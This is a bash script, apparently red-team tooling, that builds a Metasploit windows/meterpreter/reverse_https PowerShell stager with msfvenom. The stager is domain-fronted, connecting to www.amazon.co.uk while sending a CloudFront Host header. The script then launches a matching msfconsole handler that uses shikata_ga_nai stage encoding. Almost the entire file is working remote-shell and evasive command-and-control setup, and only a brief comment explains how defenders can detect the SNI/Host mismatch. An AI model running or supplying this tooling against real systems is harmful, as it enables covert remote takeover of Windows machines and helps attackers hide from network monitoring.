#!/bin/bash
#
# Builds a windows/meterpreter/reverse_https stager with msfvenom, then
# starts a matching exploit/multi/handler in msfconsole.  The stager's TLS
# connection targets $frontable_domain while its HTTP Host header names
# $fronted_domain; the handler is told to expect that Host header.
#
# Usage: script.sh [frontable_domain] [fronted_domain]
#   $1 - host the stager connects to (default www.amazon.co.uk)
#   $2 - host placed in the HTTP Host header (default your.cloudfront.net)
#
# Before use: cert_path below is a literal placeholder string, and msfpath
# assumes a framework checkout under /root.
#
# Defender note: the observable artefact of this configuration is a TLS
# connection whose SNI/certificate name ($frontable_domain) differs from the
# HTTP Host header inside it ($fronted_domain); proxies and CDN logs that
# compare SNI with Host can alert on this mismatch.
frontable_domain=${1:-www.amazon.co.uk}
fronted_domain=${2:-your.cloudfront.net}
cert_path="ssl cert path"   # placeholder — replace with the real certificate path
cdn_port=443                # port the stager connects to (LPORT in the stager)
local_port=443              # port the local handler listens on
echo "Frontable domain: $frontable_domain, Fronted: $fronted_domain"
msfpath="/root/metasploit-framework"
msfvenom="${msfpath}/msfvenom"
msfconsole="${msfpath}/msfconsole"
# Command template; %token% placeholders are filled in below.
_stager_gen="${msfvenom} -p windows/meterpreter/reverse_https LHOST=%frontable_domain% LPORT=%cdn_port% HttpHostHeader=%fronted_domain% StagerVerifySSLCert=true PayloadUUIDTracking=true PayloadUUIDName=bocrev -f psh-cmd"
# ${var/pattern/repl} replaces the first occurrence only; each token appears once.
stager_gen=${_stager_gen/'%frontable_domain%'/$frontable_domain}
stager_gen=${stager_gen/'%fronted_domain%'/$fronted_domain}
stager_gen=${stager_gen/'%cdn_port%'/$cdn_port}
# Executes the assembled string via unquoted word-splitting: the substituted
# values are not shell-escaped, so none of them may contain whitespace.
$stager_gen
# Pause after generation; purpose not stated — presumably to let the
# msfvenom output be read before msfconsole takes over the terminal (TODO confirm).
sleep 10
#listener_file="df_un_en.rctemplate"
#_listener=$(cat "$listener_file")
# msfconsole resource-script template; %token% placeholders are filled in below.
_listener="
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST %frontable_domain%
set LPORT %local_port%
set OverrideRequestHost true
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set HttpHostHeader %fronted_domain%
set HandlerSSLCert %cert_path%
set IgnoreUnknownPayloads true
set StagerVerifySSLCert true
set ExitOnSession false
exploit -j -z
"
listener=${_listener/'%frontable_domain%'/$frontable_domain}
listener=${listener/'%fronted_domain%'/$fronted_domain}
# The template above contains no %cdn_port% token, so this substitution is a no-op.
listener=${listener/'%cdn_port%'/$cdn_port}
listener=${listener/'%local_port%'/$local_port}
listener=${listener/'%cert_path%'/$cert_path}
# Hand the filled-in resource script to msfconsole through process
# substitution, so no temporary file is written to disk.
${msfconsole} -r <(echo "$listener")